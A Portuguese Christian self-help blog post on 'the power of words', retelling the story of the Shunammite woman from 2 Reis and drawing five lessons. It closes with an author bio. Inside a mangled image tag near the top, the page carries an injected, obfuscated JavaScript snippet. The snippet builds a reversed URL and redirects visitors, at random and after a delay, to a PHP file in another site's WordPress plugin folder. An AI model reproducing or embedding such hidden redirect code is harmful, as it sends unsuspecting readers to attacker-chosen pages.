O poder das palavras- Aprenda a usar as palavras como suas aliadas.

Aprenda a usar o poder das palavras. A palavra que você está dizendo tanto pode ser sua melhor aliada, como pode ser sua pior inimiga.

Entenda o poder das palavras que você anda dizendo e qual a influência elas tem sobre a sua vida e das pessoas ao seu redor.

Quando usamos mal a nossa boca podemos permitir que sejamos nossos inimigos naquilo que desejamos ou precisamos.

Mulher Reclam<script srcset=$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando” width=”179″ height=”300″ />

Muito ouvimos falar do poder do pensamento positivo, muitas vezes ficamos treinando nossa mente para pensar positivamente em algo que desejamos para que se materialize.

O livro “O Segredo” ficou muito famoso por mostrar como podemos conseguir realizar coisas pensando e sentindo da maneira certa.

Eu acredito que nosso pensamento tem muito poder sobre nossa vida e atitudes. Mas  e quanto a nossas palavras?

E quando ficamos treinando nossa mente para ter sucesso, fama, dinheiro ou desejos realizados e de nossa boca sai todo tipo de palavra negativa, de maldição, de murmuração?

Existem muitos versículos na Bíblia falando sobre controlar a língua, fala que a língua é um pequeno membro mas  pode fazer muitas coisas. Diz que a língua é um fogo e contamina todo o corpo, e inflama o curso da natureza…( Tiago 3 ) enfim, diz que devemos controlar nossa língua.

Sabendo disso, vamos pensar um pouco em como nos portamos no nosso dia a dia.

Antes, quero te contar uma história muito bonita que se encontra na Bíblia no livro de 2 Reis, é a história de um profeta , seu discípulo e uma mulher. O nome dessa mulher nós não sabemos, conhecemos ela apenas como mulher sunamita, que faz referência ao local onde ela morava.

De tempos em tempos o profeta Eliseu e seu discípulo saiam de sua cidade e caminhavam longa distância para a cidade onde morava a mulher para subir em um monte adorar ao Senhor.

Essa mulher observou que eles passavam sempre por ali, resolveu um dia chamá-los para comer pão, e sempre que passavam por ali eles passavam na casa dela para se alimentar.

Um dia ela pediu ao marido para construir um quartinho para que o profeta repousasse quando passasse por aquela cidade quando vinha adorar a Deus. E assim foi feito.

Construíram um quarto tranquilo em que o profeta poderia descansar e fazer suas orações.

Para ela, fazer o bem a um homem de Deus era como se estivesse fazendo o bem ao próprio Deus, ela valorizava as coisas espirituais.

Eliseu, vendo a sua dedicação, faz uma ultima prova de fé, oferecendo recompensas materiais ou honras sociais, mas a mulher sunamita não buscava honras nem dinheiro, ela valorizava a família, estar entre amigos.

Eliseu gostaria de saber se haveria algo que ele pudesse fazer para abençoar aquela mulher. Veio então o seu discípulo e contou a ele que ela não tinha filhos, que era um sonho antigo que ela tinha deixado no passado.

A atitude de amor a Deus dessa mulher, sem reclamar por não ter o filho que ela tanto desejou fez com que Deus prometesse a ela que dali a um ano ela teria um filho.

E completando o tempo ela teve o filho que tanto tinha desejado. O lar daquela mulher agora era cheio de vida com a criança correndo e brincando por ali. Naquela época era uma vergonha a mulher não gerar filhos e a lei permitia que o marido se divorciasse da esposa caso ela não gerasse filhos. Deus então deu a essa mulher um presente precioso.

O filho era uma benção, ajudava ao pai no trabalho, era obediente, mas um dia, depois de expor-se tempo ao sol forte daquela região ele passou mal, foi levado à sua mãe , mas veio a falecer. Que momentos de dor passou essa mulher, vendo seu filho tão desejado morrer em seus braços sem poder fazer nada.

Mesmo assim aquela mulher forte e decidida não temeu, não aceitou a morte de seu filho.

Ela levou seu filho até o quarto que foi construído ao profeta e o deitou, sem vida , na cama do profeta e saiu rumo ao monte Carmelo , onde o profeta buscava a Deus. Pediu ao marido um moço para acompanhá-la e  disse a ele que estava tudo bem, foram 24 km na estrada, mas ela conhecia o Deus que tinha dado a ela o filho e conhecia o seu poder. Não murmurou nem ficou maldizendo, não permitiu que o poder das palavras ruins a abatesse, simplesmente saiu a buscar o homem de Deus.

Quando chegou no monte o profeta avistou-a e pediu ao discípulo que perguntasse a ela : – Vai tudo bem com você, seu marido, seu filho?  Ela disse: -Vai bem.

Mas chegando perto do profeta, jogou-se aos pés dele ,  Eliseu então percebeu que ela estava em profunda tristeza, ai ficou sabendo que o filho estava morto.

Para concluir a história, Eliseu desce à casa dela e vê o filho deitado morto em sua cama e ora a Deus que ressuscitou ao moço.

O que podemos aprender com essa mulher sobre o poder das palavras?

1- Ela em nenhum momento deixou que o poder das palavras negativas de maldição ou de  mágoa tomassem conta de seus sentimentos. Muito pelo contrário, quando foi perguntada ela respondeu que tudo ia bem ao discípulo e ao marido. Se ela começasse a praguejar com certeza ela não alcançaria a benção de ter seu filho vivo novamente, nem ao menos iria procurar o profeta, pois somente conseguiria enxergar o filho morto. Ela resolveu acreditar em Deus e buscá-lo ao invés de reclamar da vida.

2- Quando o marido ou o discípulo perguntaram a ela se estava tudo bem ela disse que sim. De nada adianta ficarmos falando dos nossos problemas a todo mundo. Abra sua boca para falar apenas às pessoas que podem te ajudar. Quando falamos de nossos problemas nossa atitude emocional se abala e os poderes espirituais do mal se fortalecem, use o poder das palavras de forma a te fortalecerem, fale de seus problemas somente para as pessoas que realmente podem te ajudar, que são confiáveis.

3- Ao ver seu filho morto ela não saiu se descabelando pelas ruas da cidade. Muitas vezes nos sentimos carentes de atenção e falamos para todas as pessoas que encontramos em nossa frente sobre o que estamos passando, muitas vezes inconscientemente querendo provocar a pena das pessoas sobre nós, mas enquanto estamos nos sentindo coitadinhos nós deixamos esse sentimento oprimir cada dia mais nosso emocional e vamos nos sentindo deprimidos e cada dia com menos vontade de reagir e ter a vida que podemos ter.

4- Podemos aprender que não importa quais são os nossos sonhos e quanto tempo eles já estão enterrados, eles podem ressuscitar. O seu sonho pode ser se livrar dessa Ansiedade que te consome, pode ser ver um filho ou marido mudado, ver seu casamento restaurado, se libertar de vícios que aos seus olhos são impossíveis. Creia e fale com a sua boca somente coisas que possam trazer coisas boas a você e às outras pessoas.

5- E por último uma das coisas que acredito que mais tem importância em nossa vida, AME, ame a você, ame as pessoas ao seu redor, ame seus inimigos.

Coração Escrito Amor

O amor é a melhor semente que podemos plantar. Se não fosse o amor da Sunamita ela nem sequer teria o filho que ela tanto desejou um dia, mas como ela resolveu agir com amor com o profeta ela pode colher muitas coisas boas em sua vida.

Espero que essa história possa te inspirar a começar a dar mais atenção às suas palavras e às sementes que você tem plantado em sua vida.

E se você gostou e acha que pode ajudar outras pessoas a melhorarem de vida, compartilhe , plante a semente de mudança na vida de outras pessoas.

Que você tenha vitória cada dia mais nas suas lutas e vá se transformando a cada dia numa pessoa mais feliz.

Com amor.

Rose

 

 

E-book Grátis ensina Como Controlar o TRANSTORNO DE ANSIEDADE de forma simples.

Rosemary

Formada em Odontologia pela Faculdade de Odontologia de Bauru-USP, com especialização em Ortodontia e Ortopedia Facial pela FUNBEO-USP, sempre se interessou pelo Desenvolvimento Pessoal, por isso, paralelamente à Odontologia cursou Medicina Tradicional Chinesa-Acupuntura, Body Mind Talk e Terapia TFT e formou-se em Coaching Pessoal e Profissional pela Sociedade Brasileira de Coaching. Atua em consultório particular exercendo Ortodontia e atende clientes de Terapia e Coaching.

Website: http://rosemarydecastro.com